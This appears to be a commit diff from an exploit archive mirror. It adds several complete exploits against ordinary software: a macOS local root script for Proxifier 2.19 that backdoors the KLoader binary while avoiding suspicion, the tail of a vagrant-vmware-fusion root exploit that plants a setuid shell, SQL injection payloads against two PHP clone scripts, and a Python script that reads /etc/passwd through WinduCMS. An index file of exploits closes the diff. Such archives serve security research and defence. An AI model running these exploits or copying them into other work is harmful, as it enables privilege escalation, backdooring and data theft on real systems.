seteuid(0);
execl("/bin/bash","bash","-c","/bin/bash;rm -f $target",NULL);
return 0;
}
EOF
gcc -o $target $target.c
rm -f $target.c
cat > vagrant_vmware_desktop_sudo_helper <<EOF
#!/usr/bin/env ruby
\`chown root:wheel $target\`
\`chmod 4755 $target\`
EOF
chmod 755 vagrant_vmware_desktop_sudo_helper
cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
config.vm.box = '$box'
end
EOF
vagrant up 2>/dev/null &
while :
do
r=`ls -la $target |grep -- '-rwsr-xr-x 1 root wheel'`
if [ "$r" != "" ] ; then
break
fi
sleep 0.2
done
killall -9 vagrant
echo
echo "Sorry Hashicorp.. still fail :P"
echo
sleep 1
cd
$target

87
exploits/macos/local/43225.sh Executable file
View file

@ -0,0 +1,87 @@
# With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader
# binary that ships with Proxifier <= 2.18.
#
# Unfortunately 2.19 is also vulnerable to a slightly different attack that
# yields the same result.
#
# When Proxifier is first run, if the KLoader binary is not suid root it gets
# executed as root by Proxifier.app (the user is prompted to enter an admin
# password). The KLoader binary will then make itself suid root so that it
# doesn't need to prompt the user again.
#
# The Proxifier developers added parameter sanitisation and kext signature
# verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app
# does no verification of the KLoader binary that gets executed as root.
#
# The directory KLoader sits in is not root-owned so we can replace it with
# our own binary that will get executed as root when Proxifier starts.
#
# To avoid raising any suspicion, as soon we get executed as root we can swap
# the real KLoader binary back into place and forward the execution call on
# to it. It does require the user to re-enter their credentials the next time
# Proxifier is run but it's likely most users wouldn't think anything of this.
#
# Users should upgrade to version 2.19.2.
#
# https://m4.rkw.io/proxifier_privesc_219.sh.txt
# 3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac
# -------------------------------------------------------------------
#!/bin/bash
#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.19 #
#####################################################################
# by m4rkw, shouts to #coolkids :P #
#####################################################################
cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
gcc -o /tmp/a a.c
cat > a.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
int main(int ac, char *av[])
{
if (geteuid() != 0) {
printf("KLoader: UID not set to 0\n");
return 104;
} else {
seteuid(0);
setuid(0);
chown("/tmp/a", 0, 0);
chmod("/tmp/a", strtol("4755", 0, 8));
rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");
chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));
execv("/Applications/Proxifier.app/Contents/KLoader", av);
return 0;
}
}
EOF
mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2
gcc -o /Applications/Proxifier.app/Contents/KLoader a.c
rm -f a.c
echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root."

26
exploits/php/webapps/43213.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: FS Makemytrip Clone - SQL Injection
# Date: 2017-12-05
# Exploit Author: Dan°
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/makemytrip-clone/
# Version: 2017-12-05
# Tested on: Kali Linux 2.0
(PoC):
SQL Injection on GET parameter = id
http://localhost/pages.php?id=
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2990=2990
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-4648 UNION ALL SELECT
NULL,NULL,CONCAT(0x716b767a71,0x47714f5a66644664796a6a426879674757634b707753727544424f616944536d4d70655276565854,0x7178627171),NULL--
YbYU
---

36
exploits/php/webapps/43214.py Executable file
View file

@ -0,0 +1,36 @@
#!/usr/bin/python
#
# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure
# Date: 2017-12-03
# Exploit Author: Maciek Krupa
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
#
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#
from requests_toolbelt import MultipartEncoder
import requests
print("WinduCMS <= 3.1 Exploit")
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = 'attacker@example.com'
payload = '<img src="/etc/passwd"'
form_input = 'name'
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type}
print('Sending payload to target...')
r = requests.post(url, data=m.to_string(), headers=headers)
if r.status_code == 200:
print('Exploited.')

29
exploits/php/webapps/43215.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: FS Shaadi Clone - SQL Injection
# Date: 2017-12-05
# Exploit Author: Dan°
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/shaadi-clone/
# Version: 2017-12-05
# Tested on: Kali Linux 2.0
(PoC):
SQL Injection on GET parameter = token
http://localhost/view_profile.php?token=
---
Parameter: token (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: token=2060a87ff679a2f3e71d9181a67b7542122c' AND 9253=9253--
Eqjw
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: token=2060a87ff679a2f3e71d9181a67b7542122c' AND SLEEP(5)-- aVZf
Type: UNION query
Title: Generic UNION query (NULL) - 77 columns
Payload: token=-5886' UNION ALL SELECT
NULL,CONCAT(0x7162787171,0x6153755a46504d6a546578714d765a594a5359556c414f4d736c45444958686e4455564770526272,0x7170787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
nVKG
---

13
files_exploits.csv
View file

@ -9367,6 +9367,16 @@ id,file,description,date,author,type,platform,port
43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows,
43192,exploits/win_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,win_x86,
43201,exploits/macos/local/43201.rb,"macOS High Sierra - Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos,
43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43218,exploits/macos/local/43218.sh,"Arq 5.9.6 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43219,exploits/macos/local/43219.sh,"Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43220,exploits/macos/local/43220.sh,"Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43221,exploits/macos/local/43221.sh,"Sera 1.2 - Local Privilege Escalation / Password Disclosure",2017-12-06,"Mark Wadham",local,macos,
43222,exploits/macos/local/43222.sh,"Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43225,exploits/macos/local/43225.sh,"Proxifier for Mac 2.19 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -38245,3 +38255,6 @@ id,file,description,date,author,type,platform,port
43210,exploits/windows/webapps/43210.txt,"Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation",2017-12-05,"Konstantinos Alexiou",webapps,windows,
43211,exploits/php/webapps/43211.txt,"Techno Portfolio Management Panel - 'id' SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,
43212,exploits/php/webapps/43212.txt,"Readymade Classifieds Script 1.0 - SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php,
43213,exploits/php/webapps/43213.txt,"FS Makemytrip Clone - 'id' SQL Injection",2017-12-06,Dan°,webapps,php,
43214,exploits/php/webapps/43214.py,"WinduCMS 3.1 - Local File Disclosure",2017-12-06,"Maciek Krupa",webapps,php,
43215,exploits/php/webapps/43215.txt,"FS Shaadi Clone - 'token' SQL Injection",2017-12-06,Dan°,webapps,php,80

Can't render this file because it is too large.